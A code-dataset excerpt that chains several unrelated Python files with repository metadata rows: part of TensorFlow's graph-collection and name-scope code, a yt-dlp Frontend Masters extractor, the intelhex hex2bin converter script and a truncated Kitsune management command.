"""Standard names to use for graph collections.
The standard library uses various well-known names to collect and
retrieve values associated with a graph. For example, the
`tf.Optimizer` subclasses default to optimizing the variables
collected under `tf.GraphKeys.TRAINABLE_VARIABLES` if none is
specified, but it is also possible to pass an explicit list of
variables.
The following standard keys are defined:
* `GLOBAL_VARIABLES`: the default collection of `Variable` objects, shared
across distributed environment (model variables are subset of these). See
`tf.compat.v1.global_variables`
for more details.
Commonly, all `TRAINABLE_VARIABLES` variables will be in `MODEL_VARIABLES`,
and all `MODEL_VARIABLES` variables will be in `GLOBAL_VARIABLES`.
* `LOCAL_VARIABLES`: the subset of `Variable` objects that are local to each
machine. Usually used for temporarily variables, like counters.
Note: use `tf.contrib.framework.local_variable` to add to this collection.
* `MODEL_VARIABLES`: the subset of `Variable` objects that are used in the
model for inference (feed forward). Note: use
`tf.contrib.framework.model_variable` to add to this collection.
* `TRAINABLE_VARIABLES`: the subset of `Variable` objects that will
be trained by an optimizer. See
`tf.compat.v1.trainable_variables`
for more details.
* `SUMMARIES`: the summary `Tensor` objects that have been created in the
graph. See
`tf.compat.v1.summary.merge_all`
for more details.
* `QUEUE_RUNNERS`: the `QueueRunner` objects that are used to
produce input for a computation. See
`tf.compat.v1.train.start_queue_runners`
for more details.
* `MOVING_AVERAGE_VARIABLES`: the subset of `Variable` objects that will also
keep moving averages. See
`tf.compat.v1.moving_average_variables`
for more details.
* `REGULARIZATION_LOSSES`: regularization losses collected during graph
construction.
The following standard keys are _defined_, but their collections are **not**
automatically populated as many of the others are:
* `WEIGHTS`
* `BIASES`
* `ACTIVATIONS`
"""
# Key to collect Variable objects that are global (shared across machines).
# Default collection for all variables, except local ones.
GLOBAL_VARIABLES = "variables"
# Key to collect local variables that are local to the machine and are not
# saved/restored.
LOCAL_VARIABLES = "local_variables"
# Key to collect local variables which are used to accumulate interal state
# to be used in tf.metrics.*.
METRIC_VARIABLES = "metric_variables"
# Key to collect model variables defined by layers.
MODEL_VARIABLES = "model_variables"
# Key to collect Variable objects that will be trained by the
# optimizers.
TRAINABLE_VARIABLES = "trainable_variables"
# Key to collect summaries.
SUMMARIES = "summaries"
# Key to collect QueueRunners.
QUEUE_RUNNERS = "queue_runners"
# Key to collect table initializers.
TABLE_INITIALIZERS = "table_initializer"
# Key to collect asset filepaths. An asset represents an external resource
# like a vocabulary file.
ASSET_FILEPATHS = "asset_filepaths"
# Key to collect Variable objects that keep moving averages.
MOVING_AVERAGE_VARIABLES = "moving_average_variables"
# Key to collect regularization losses at graph construction.
REGULARIZATION_LOSSES = "regularization_losses"
# Key to collect concatenated sharded variables.
CONCATENATED_VARIABLES = "concatenated_variables"
# Key to collect savers.
SAVERS = "savers"
# Key to collect weights
WEIGHTS = "weights"
# Key to collect biases
BIASES = "biases"
# Key to collect activations
ACTIVATIONS = "activations"
# Key to collect update_ops
UPDATE_OPS = "update_ops"
# Key to collect losses
LOSSES = "losses"
# Key to collect BaseSaverBuilder.SaveableObject instances for checkpointing.
SAVEABLE_OBJECTS = "saveable_objects"
# Key to collect all shared resources used by the graph which need to be
# initialized once per cluster.
RESOURCES = "resources"
# Key to collect all shared resources used in this graph which need to be
# initialized once per session.
LOCAL_RESOURCES = "local_resources"
# Trainable resource-style variables.
TRAINABLE_RESOURCE_VARIABLES = "trainable_resource_variables"
# Key to indicate various ops.
INIT_OP = "init_op"
LOCAL_INIT_OP = "local_init_op"
READY_OP = "ready_op"
READY_FOR_LOCAL_INIT_OP = "ready_for_local_init_op"
SUMMARY_OP = "summary_op"
GLOBAL_STEP = "global_step"
# Used to count the number of evaluations performed during a single evaluation
# run.
EVAL_STEP = "eval_step"
TRAIN_OP = "train_op"
# Key for control flow context.
COND_CONTEXT = "cond_context"
WHILE_CONTEXT = "while_context"
# Used to store v2 summary names.
_SUMMARY_COLLECTION = "_SUMMARY_V2"
# List of all collections that keep track of variables.
_VARIABLE_COLLECTIONS = [
GLOBAL_VARIABLES,
LOCAL_VARIABLES,
METRIC_VARIABLES,
MODEL_VARIABLES,
TRAINABLE_VARIABLES,
MOVING_AVERAGE_VARIABLES,
CONCATENATED_VARIABLES,
TRAINABLE_RESOURCE_VARIABLES,
]
# Key for streaming model ports.
# NOTE(yuanbyu): internal and experimental.
_STREAMING_MODEL_PORTS = "streaming_model_ports"
@decorator_utils.classproperty
@deprecation.deprecated(None, "Use `tf.GraphKeys.GLOBAL_VARIABLES` instead.")
def VARIABLES(cls): # pylint: disable=no-self-argument
return cls.GLOBAL_VARIABLES
def dismantle_graph(graph):
"""Cleans up reference cycles from a `Graph`.
Helpful for making sure the garbage collector doesn't need to run after a
temporary `Graph` is no longer needed.
Args:
graph: A `Graph` object to destroy. Neither it nor any of its ops are usable
after this function runs.
"""
memory.dismantle_ordered_dict(graph._functions) # pylint: disable=protected-access
# Now clean up Operation<->Graph reference cycles by clearing all of the
# attributes for the Graph and its ops.
graph_operations = graph.get_operations()
for op in graph_operations:
op.__dict__ = {}
graph.__dict__ = {}
@tf_export(v1=["add_to_collection"])
def add_to_collection(name, value):
"""Wrapper for `Graph.add_to_collection()` using the default graph.
See `tf.Graph.add_to_collection`
for more details.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collection. @compatibility(eager)
Collections are only supported in eager when variables are created inside
an EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collection(name, value)
@tf_export(v1=["add_to_collections"])
def add_to_collections(names, value):
"""Wrapper for `Graph.add_to_collections()` using the default graph.
See `tf.Graph.add_to_collections`
for more details.
Args:
names: The key for the collections. The `GraphKeys` class contains many
standard names for collections.
value: The value to add to the collections. @compatibility(eager)
Collections are only supported in eager when variables are created inside
an EagerVariableStore (e.g. as part of a layer or template).
@end_compatibility
"""
get_default_graph().add_to_collections(names, value)
@tf_export(v1=["get_collection_ref"])
def get_collection_ref(key):
"""Wrapper for `Graph.get_collection_ref()` using the default graph.
See `tf.Graph.get_collection_ref`
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class contains
many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection. Note that this returns
the collection list itself, which can be modified in place to change the
collection.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection_ref(key)
@tf_export(v1=["get_collection"])
def get_collection(key, scope=None):
"""Wrapper for `Graph.get_collection()` using the default graph.
See `tf.Graph.get_collection`
for more details.
Args:
key: The key for the collection. For example, the `GraphKeys` class contains
many standard names for collections.
scope: (Optional.) If supplied, the resulting list is filtered to include
only items whose `name` attribute matches using `re.match`. Items without
a `name` attribute are never returned if a scope is supplied and the
choice or `re.match` means that a `scope` without special tokens filters
by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
@compatibility(eager)
Collections are not supported when eager execution is enabled.
@end_compatibility
"""
return get_default_graph().get_collection(key, scope)
def get_all_collection_keys():
"""Returns a list of collections used in the default graph."""
return get_default_graph().get_all_collection_keys()
def name_scope(name, default_name=None, values=None):
"""Internal-only entry point for `name_scope*`.
Internal ops do not use the public API and instead rely on
`ops.name_scope` regardless of the execution mode. This function
dispatches to the correct `name_scope*` implementation based on
the arguments provided and the current mode. Specifically,
* if `values` contains a graph tensor `Graph.name_scope` is used;
* `name_scope_v1` is used in graph mode;
* `name_scope_v2` -- in eager mode.
Args:
name: The name argument that is passed to the op function.
default_name: The default name to use if the `name` argument is `None`.
values: The list of `Tensor` arguments that are passed to the op function.
Returns:
`name_scope*` context manager.
"""
ctx = context.context()
in_eager_mode = ctx.executing_eagerly()
if not in_eager_mode:
return internal_name_scope_v1(name, default_name, values)
name = default_name if name is None else name
if values:
# The presence of a graph tensor in `values` overrides the context.
# TODO(slebedev): this is Keras-specific and should be removed.
# pylint: disable=unidiomatic-typecheck
graph_value = next((value for value in values if type(value) == Tensor),
None)
# pylint: enable=unidiomatic-typecheck
if graph_value is not None:
return graph_value.graph.name_scope(name)
return name_scope_v2(name or "")
class internal_name_scope_v1(object): # pylint: disable=invalid-name
"""Graph-only version of `name_scope_v1`."""
@property
def name(self):
return self._name
def __init__(self, name, default_name=None, values=None):
"""Initialize the context manager.
Args:
name: The name argument that is passed to the op function.
default_name: The default name to use if the `name` argument is `None`.
values: The list of `Tensor` arguments that are passed to the op function.
Raises:
TypeError: if `default_name` is passed in but not a string.
"""
if not (default_name is None or isinstance(default_name, six.string_types)):
raise TypeError(
"`default_name` type (%s) is not a string type. You likely meant to "
"pass this into the `values` kwarg." % type(default_name))
self._name = default_name if name is None else name
self._default_name = default_name
self._values = values
def __enter__(self):
"""Start the scope block.
Returns:
The scope name.
Raises:
ValueError: if neither `name` nor `default_name` is provided
but `values` are.
"""
if self._name is None and self._values is not None:
# We only raise an error if values is not None (provided) because
# currently tf.name_scope(None) (values=None then) is sometimes used as
# an idiom to reset to top scope.
raise ValueError(
"At least one of name (%s) and default_name (%s) must be provided."
% (self._name, self._default_name))
g = get_default_graph()
if self._values and not g.building_function:
# Specialize based on the knowledge that `_get_graph_from_inputs()`
# ignores `inputs` when building a function.
g_from_inputs = _get_graph_from_inputs(self._values)
if g_from_inputs is not g:
g = g_from_inputs
self._g_manager = g.as_default()
self._g_manager.__enter__()
else:
self._g_manager = None
else:
self._g_manager = None
try:
self._name_scope = g.name_scope(self._name)
return self._name_scope.__enter__()
except:
if self._g_manager is not None:
self._g_manager.__exit__(*sys.exc_info())
raise
def __exit__(self, *exc_info):
self._name_scope.__exit__(*exc_info)
if self._g_manager is not None:
self._g_manager.__exit__(*exc_info)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["name_scope"])
class name_scope_v1(object): # pylint: disable=invalid-name
"""A context manager for use when defining a Python op.
This context manager validates that the given `values` are from the
same graph, makes that graph the default graph, and pushes a
name scope in that graph (see
`tf.Graph.name_scope`
for more details on that).
For example, to define a new Python op called `my_op`:
```python
def my_op(a, b, c, name=None):
with tf.name_scope(name, "MyOp", [a, b, c]) as scope:
a = tf.convert_to_tensor(a, name="a")
b = tf.convert_to_tensor(b, name="b")
c = tf.convert_to_tensor(c, name="c")
# Define some computation that uses `a`, `b`, and `c`.
return foo_op(..., name=scope)
```
"""
@property
def name(self):
return self._name
def __init__(self, name, default_name=None, values=None):
"""Initialize the context manager.
Args:
name: The name argument that is passed to the op function.
default_name: The default name to use if the `name` argument is `None`.
values: The list of `Tensor` arguments that are passed to the op function.
Raises:
TypeError: if `default_name` is passed in but not a string.
"""
self._name_scope = name_scope(name, default_name, values)
self._name = default_name if name is None else name
def __enter__(self):
return self._name_scope.__enter__()
def __exit__(self, *exc_info):
return self._name_scope.__exit__(*exc_info)
def enter_eager_name_scope(ctx, name):
"""Updates the eager context to enter the given name scope."""
old_name = ctx.scope_name
if not name:
scope_name = ""
else:
if name.endswith("/"):
# A trailing slash breaks out of nested name scopes, indicating a
# fully specified scope name, for compatibility with Graph.name_scope.
scope_name = name
else:
scope_name = name + "/"
if old_name:
scope_name = old_name + scope_name
ctx.scope_name = scope_name
return scope_name, old_name
@tf_export("name_scope", v1=[])
class name_scope_v2(object):
"""A context manager for use when defining a Python op.
This context manager pushes a name scope, which will make the name of all
operations added within it have a prefix.
For example, to define a new Python op called `my_op`:
```python
def my_op(a, b, c, name=None):
with tf.name_scope("MyOp") as scope:
a = tf.convert_to_tensor(a, name="a")
b = tf.convert_to_tensor(b, name="b")
c = tf.convert_to_tensor(c, name="c")
# Define some computation that uses `a`, `b`, and `c`.
return foo_op(..., name=scope)
```
When executed, the Tensors `a`, `b`, `c`, will have names `MyOp/a`, `MyOp/b`,
and `MyOp/c`.
If the scope name already exists, the name will be made unique by appending
`_n`. For example, calling `my_op` the second time will generate `MyOp_1/a`,
etc.
"""
def __init__(self, name):
"""Initialize the context manager.
Args:
name: The prefix to use on all names created within the name scope.
Raises:
ValueError: If name is None, or not a string.
"""
if name is None or not isinstance(name, six.string_types):
raise ValueError("name for name_scope must be a string.")
self._name = name
self._exit_fns = []
@property
def name(self):
return self._name
def __enter__(self):
"""Start the scope block.
Returns:
The scope name.
Raises:
ValueError: if neither `name` nor `default_name` is provided
but `values` are.
"""
ctx = context.context()
if ctx.executing_eagerly():
scope_name, old_scope_name = enter_eager_name_scope(ctx, self._name)
self._exit_fns.append(
lambda *a: setattr(ctx, "scope_name", old_scope_name))
else:
scope = get_default_graph().name_scope(self._name)
scope_name = scope.__enter__()
self._exit_fns.append(scope.__exit__)
return scope_name
def __exit__(self, type_arg, value_arg, traceback_arg):
exit_fn = self._exit_fns.pop()
exit_fn(type_arg, value_arg, traceback_arg)
return False # False values do not suppress exceptions
def strip_name_scope(name, export_scope):
"""Removes name scope from a name.
Args:
name: A `string` name.
export_scope: Optional `string`. Name scope to remove.
Returns:
Name with name scope removed, or the original name if export_scope
is None.
"""
if export_scope:
if export_scope[-1] == "/":
export_scope = export_scope[:-1]
try:
# Strips export_scope/, export_scope///,
# ^export_scope/, loc:@export_scope/.
str_to_replace = r"([\^]|loc:@|^)" + export_scope + r"[\/]+(.*)"
return re.sub(str_to_replace, r"\1\2", compat.as_str(name), count=1)
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
def prepend_name_scope(name, import_scope):
"""Prepends name scope to a name.
Args:
name: A `string` name.
import_scope: Optional `string`. Name scope to add.
Returns:
Name with name scope added, or the original name if import_scope
is None.
"""
if import_scope:
if import_scope[-1] == "/":
import_scope = import_scope[:-1]
try:
str_to_replace = r"([\^]|loc:@|^)(.*)"
return re.sub(str_to_replace, r"\1" + import_scope + r"/\2",
compat.as_str(name))
except TypeError as e:
# If the name is not of a type we can process, simply return it.
logging.warning(e)
return name
else:
return name
# pylint: disable=g-doc-return-or-yield
# pylint: disable=not-context-manager
@tf_export(v1=["op_scope"])
@tf_contextlib.contextmanager
def op_scope(values, name, default_name=None):
"""DEPRECATED. Same as name_scope above, just different argument order."""
logging.warn("tf.op_scope(values, name, default_name) is deprecated,"
" use tf.name_scope(name, default_name, values)")
with name_scope(name, default_name=default_name, values=values) as scope:
yield scope
_proto_function_registry = registry.Registry("proto functions")
def register_proto_function(collection_name,
proto_type=None,
to_proto=None,
from_proto=None):
"""Registers `to_proto` and `from_proto` functions for collection_name.
`to_proto` function converts a Python object to the corresponding protocol
buffer, and returns the protocol buffer.
`from_proto` function converts protocol buffer into a Python object, and
returns the object..
Args:
collection_name: Name of the collection.
proto_type: Protobuf type, such as `saver_pb2.SaverDef`,
`variable_pb2.VariableDef`, `queue_runner_pb2.QueueRunnerDef`..
to_proto: Function that implements Python object to protobuf conversion.
from_proto: Function that implements protobuf to Python object conversion.
"""
if to_proto and not callable(to_proto):
raise TypeError("to_proto must be callable.")
if from_proto and not callable(from_proto):
raise TypeError("from_proto must be callable.")
_proto_function_registry.register((proto_type, to_proto, from_proto),
collection_name)
def get_collection_proto_type(collection_name):
"""Returns the proto_type for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[0]
except LookupError:
return None
def get_to_proto_function(collection_name):
"""Returns the to_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[1]
except LookupError:
return None
def get_from_proto_function(collection_name):
"""Returns the from_proto function for collection_name."""
try:
return _proto_function_registry.lookup(collection_name)[2]
except LookupError:
return None
def _operation_conversion_error(op, dtype=None, name=None, as_ref=False):
"""Produce a nice error if someone converts an Operation to a Tensor."""
raise TypeError(("Can't convert Operation '%s' to Tensor "
"(target dtype=%r, name=%r, as_ref=%r)") %
(op.name, dtype, name, as_ref))
def _op_to_colocate_with(v, graph):
"""Operation object corresponding to v to use for colocation constraints."""
if v is None:
return None
if isinstance(v, Operation):
return v
# We always want to colocate with the reference op.
# When 'v' is a ResourceVariable, the reference op is the handle creating op.
#
# What this should be is:
# if isinstance(v, ResourceVariable):
# return v.handle.op
# However, that would require a circular import dependency.
# As of October 2018, there were attempts underway to remove
# colocation constraints altogether. Assuming that will
# happen soon, perhaps this hack to work around the circular
# import dependency is acceptable.
if hasattr(v, "handle") and hasattr(v.handle, "op") and isinstance(
v.handle.op, Operation):
if graph.building_function:
return graph.capture(v.handle).op
else:
return v.handle.op
return internal_convert_to_tensor_or_indexed_slices(v, as_ref=True).op
def _is_keras_symbolic_tensor(x):
return hasattr(x, "graph") and getattr(x.graph, "name", None) == "keras_graph"
tensor_conversion_registry.register_tensor_conversion_function(
Operation, _operation_conversion_error)
# These symbols were originally defined in this module; import them for
# backwards compatibility until all references have been updated to access
# them from the indexed_slices.py module.
IndexedSlices = indexed_slices.IndexedSlices
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
convert_to_tensor_or_indexed_slices = \
indexed_slices.convert_to_tensor_or_indexed_slices
convert_n_to_tensor_or_indexed_slices = \
indexed_slices.convert_n_to_tensor_or_indexed_slices
internal_convert_to_tensor_or_indexed_slices = \
indexed_slices.internal_convert_to_tensor_or_indexed_slices
internal_convert_n_to_tensor_or_indexed_slices = \
indexed_slices.internal_convert_n_to_tensor_or_indexed_slices
register_tensor_conversion_function = \
tensor_conversion_registry.register_tensor_conversion_function
| 36.432153 | 115 | 0.692222 |
f5fdf531191cce59cbcc7728a6e6c256a035ba05 | 91 | py | Python | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | 30.strings/4.center.py | robinson-1985/python-zero-dnc | df510d67e453611fcd320df1397cdb9ca47fecb8 | [
"MIT"
] | null | null | null | # 3. center() -> Retorna a string como centro e preenche com espaços o restante do tamanho. | 91 | 91 | 0.747253 |
0d29da29b850a83458cf0e0f1ddbf27e84c72b91 | 8,820 | py | Python | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | 2 | 2022-03-14T15:34:14.000Z | 2022-03-23T17:05:42.000Z | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/frontendmasters.py | michaeljohnm/yt-dlp | 962a5cd9c4e92c3140ae2fe245c0cb0de6e177c7 | [
"Unlicense"
] | 1 | 2022-01-03T08:13:27.000Z | 2022-01-03T08:13:27.000Z | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
parse_duration,
url_or_none,
urlencode_postdata,
)
class FrontendMastersBaseIE(InfoExtractor):
_API_BASE = 'https://api.frontendmasters.com/v1/kabuki'
_LOGIN_URL = 'https://frontendmasters.com/login/'
_NETRC_MACHINE = 'frontendmasters'
_QUALITIES = {
'low': {'width': 480, 'height': 360},
'mid': {'width': 1280, 'height': 720},
'high': {'width': 1920, 'height': 1080}
}
def _real_initialize(self):
self._login()
def _login(self):
(username, password) = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'username': username,
'password': password
})
post_url = self._search_regex(
r'<form[^>]+action=(["\'])(?P<url>.+?)\1', login_page,
'post_url', default=self._LOGIN_URL, group='url')
if not post_url.startswith('http'):
post_url = compat_urlparse.urljoin(self._LOGIN_URL, post_url)
response = self._download_webpage(
post_url, None, 'Logging in', data=urlencode_postdata(login_form),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
# Successful login
if any(p in response for p in (
'wp-login.php?action=logout', '>Logout')):
return
error = self._html_search_regex(
r'class=(["\'])(?:(?!\1).)*\bMessageAlert\b(?:(?!\1).)*\1[^>]*>(?P<error>[^<]+)<',
response, 'error message', default=None, group='error')
if error:
raise ExtractorError('Unable to login: %s' % error, expected=True)
raise ExtractorError('Unable to log in')
class FrontendMastersPageBaseIE(FrontendMastersBaseIE):
def _download_course(self, course_name, url):
return self._download_json(
'%s/courses/%s' % (self._API_BASE, course_name), course_name,
'Downloading course JSON', headers={'Referer': url})
@staticmethod
def _extract_chapters(course):
chapters = []
lesson_elements = course.get('lessonElements')
if isinstance(lesson_elements, list):
chapters = [url_or_none(e) for e in lesson_elements if url_or_none(e)]
return chapters
@staticmethod
def _extract_lesson(chapters, lesson_id, lesson):
title = lesson.get('title') or lesson_id
display_id = lesson.get('slug')
description = lesson.get('description')
thumbnail = lesson.get('thumbnail')
chapter_number = None
index = lesson.get('index')
element_index = lesson.get('elementIndex')
if (isinstance(index, int) and isinstance(element_index, int)
and index < element_index):
chapter_number = element_index - index
chapter = (chapters[chapter_number - 1]
if chapter_number - 1 < len(chapters) else None)
duration = None
timestamp = lesson.get('timestamp')
if isinstance(timestamp, compat_str):
mobj = re.search(
r'(?P<start>\d{1,2}:\d{1,2}:\d{1,2})\s*-(?P<end>\s*\d{1,2}:\d{1,2}:\d{1,2})',
timestamp)
if mobj:
duration = parse_duration(mobj.group('end')) - parse_duration(
mobj.group('start'))
return {
'_type': 'url_transparent',
'url': 'frontendmasters:%s' % lesson_id,
'ie_key': FrontendMastersIE.ie_key(),
'id': lesson_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'chapter': chapter,
'chapter_number': chapter_number,
}
class FrontendMastersIE(FrontendMastersBaseIE):
_VALID_URL = r'(?:frontendmasters:|https?://api\.frontendmasters\.com/v\d+/kabuki/video/)(?P<id>[^/]+)'
_TESTS = [{
'url': 'https://api.frontendmasters.com/v1/kabuki/video/a2qogef6ba',
'md5': '7f161159710d6b7016a4f4af6fcb05e2',
'info_dict': {
'id': 'a2qogef6ba',
'ext': 'mp4',
'title': 'a2qogef6ba',
},
'skip': 'Requires FrontendMasters account credentials',
}, {
'url': 'frontendmasters:a2qogef6ba',
'only_matching': True,
}]
def _real_extract(self, url):
lesson_id = self._match_id(url)
source_url = '%s/video/%s/source' % (self._API_BASE, lesson_id)
formats = []
for ext in ('webm', 'mp4'):
for quality in ('low', 'mid', 'high'):
resolution = self._QUALITIES[quality].copy()
format_id = '%s-%s' % (ext, quality)
format_url = self._download_json(
source_url, lesson_id,
'Downloading %s source JSON' % format_id, query={
'f': ext,
'r': resolution['height'],
}, headers={
'Referer': url,
}, fatal=False)['url']
if not format_url:
continue
f = resolution.copy()
f.update({
'url': format_url,
'ext': ext,
'format_id': format_id,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {
'en': [{
'url': '%s/transcripts/%s.vtt' % (self._API_BASE, lesson_id),
}]
}
return {
'id': lesson_id,
'title': lesson_id,
'formats': formats,
'subtitles': subtitles
}
class FrontendMastersLessonIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<course_name>[^/]+)/(?P<lesson_name>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/tools',
'info_dict': {
'id': 'a2qogef6ba',
'display_id': 'tools',
'ext': 'mp4',
'title': 'Tools',
'description': 'md5:82c1ea6472e88ed5acd1829fe992e4f7',
'thumbnail': r're:^https?://.*\.jpg$',
'chapter': 'Introduction',
'chapter_number': 1,
},
'params': {
'skip_download': True,
},
'skip': 'Requires FrontendMasters account credentials',
}
def _real_extract(self, url):
mobj = self._match_valid_url(url)
course_name, lesson_name = mobj.group('course_name', 'lesson_name')
course = self._download_course(course_name, url)
lesson_id, lesson = next(
(video_id, data)
for video_id, data in course['lessonData'].items()
if data.get('slug') == lesson_name)
chapters = self._extract_chapters(course)
return self._extract_lesson(chapters, lesson_id, lesson)
class FrontendMastersCourseIE(FrontendMastersPageBaseIE):
_VALID_URL = r'https?://(?:www\.)?frontendmasters\.com/courses/(?P<id>[^/]+)'
_TEST = {
'url': 'https://frontendmasters.com/courses/web-development/',
'info_dict': {
'id': 'web-development',
'title': 'Introduction to Web Development',
'description': 'md5:9317e6e842098bf725d62360e52d49a6',
},
'playlist_count': 81,
'skip': 'Requires FrontendMasters account credentials',
}
@classmethod
def suitable(cls, url):
return False if FrontendMastersLessonIE.suitable(url) else super(
FrontendMastersBaseIE, cls).suitable(url)
def _real_extract(self, url):
course_name = self._match_id(url)
course = self._download_course(course_name, url)
chapters = self._extract_chapters(course)
lessons = sorted(
course['lessonData'].values(), key=lambda data: data['index'])
entries = []
for lesson in lessons:
lesson_name = lesson.get('slug')
lesson_id = lesson.get('hash') or lesson.get('statsId')
if not lesson_id or not lesson_name:
continue
entries.append(self._extract_lesson(chapters, lesson_id, lesson))
title = course.get('title')
description = course.get('description')
return self.playlist_result(entries, course_name, title, description)
| 33.409091 | 113 | 0.560884 |
f84f70308497ce4354165d036ecda0e135aac898 | 4,678 | py | Python | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | scripts/hex2bin.py | pablovillars/intelhex | c9beea9f1000d632057efa7ee15f8d1645d0ca97 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2005-2018 Alexander Belchenko
# All rights reserved.
#
# Redistribution and use in source and binary forms,
# with or without modification, are permitted provided
# that the following conditions are met:
#
# * Redistributions of source code must retain
# the above copyright notice, this list of conditions
# and the following disclaimer.
# * Redistributions in binary form must reproduce
# the above copyright notice, this list of conditions
# and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the author nor the names
# of its contributors may be used to endorse
# or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Intel HEX file format hex2bin convertor utility.'''
VERSION = '2.3.0'
if __name__ == '__main__':
import getopt
import os
import sys
usage = '''Hex2Bin convertor utility.
Usage:
python hex2bin.py [options] INFILE [OUTFILE]
Arguments:
INFILE name of hex file for processing.
OUTFILE name of output file. If omitted then output
will be writing to stdout.
Options:
-h, --help this help message.
-v, --version version info.
-p, --pad=FF pad byte for empty spaces (ascii hex value).
-r, --range=START:END specify address range for writing output
(ascii hex value).
Range can be in form 'START:' or ':END'.
-l, --length=NNNN,
-s, --size=NNNN size of output (decimal value).
'''
pad = None
start = None
end = None
size = None
try:
opts, args = getopt.getopt(sys.argv[1:], "hvp:r:l:s:",
["help", "version", "pad=", "range=",
"length=", "size="])
for o, a in opts:
if o in ("-h", "--help"):
print(usage)
sys.exit(0)
elif o in ("-v", "--version"):
print(VERSION)
sys.exit(0)
elif o in ("-p", "--pad"):
try:
pad = int(a, 16) & 0x0FF
except:
raise getopt.GetoptError('Bad pad value')
elif o in ("-r", "--range"):
try:
l = a.split(":")
if l[0] != '':
start = int(l[0], 16)
if l[1] != '':
end = int(l[1], 16)
except:
raise getopt.GetoptError('Bad range value(s)')
elif o in ("-l", "--lenght", "-s", "--size"):
try:
size = int(a, 10)
except:
raise getopt.GetoptError('Bad size value')
if start != None and end != None and size != None:
raise getopt.GetoptError('Cannot specify START:END and SIZE simultaneously')
if not args:
raise getopt.GetoptError('Hex file is not specified')
if len(args) > 2:
raise getopt.GetoptError('Too many arguments')
except getopt.GetoptError:
msg = sys.exc_info()[1] # current exception
txt = 'ERROR: '+str(msg) # that's required to get not-so-dumb result from 2to3 tool
print(txt)
print(usage)
sys.exit(2)
fin = args[0]
if not os.path.isfile(fin):
txt = "ERROR: File not found: %s" % fin # that's required to get not-so-dumb result from 2to3 tool
print(txt)
sys.exit(1)
if len(args) == 2:
fout = args[1]
else:
# write to stdout
from intelhex import compat
fout = compat.get_binary_stdout()
from intelhex import hex2bin
sys.exit(hex2bin(fin, fout, start, end, size, pad))
| 35.172932 | 107 | 0.579521 |
229b6ab192226872d3b3a56df57bf2c8db312dab | 647 | py | Python | apps/wiki/management/commands/dump_topics.py | storagebot/kitsune | 613ba2ca09104f330ab77088b452391169096249 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/wiki/management/commands/dump_topics.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/wiki/management/commands/dump_topics.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | from django.core.management.base import BaseCommand
from taggit.models import TaggedItem
from wiki.models import Document
class Command(BaseCommand):
help = 'Dumps out a python file with the topic strings.'
def handle(self, *arg, **kwargs):
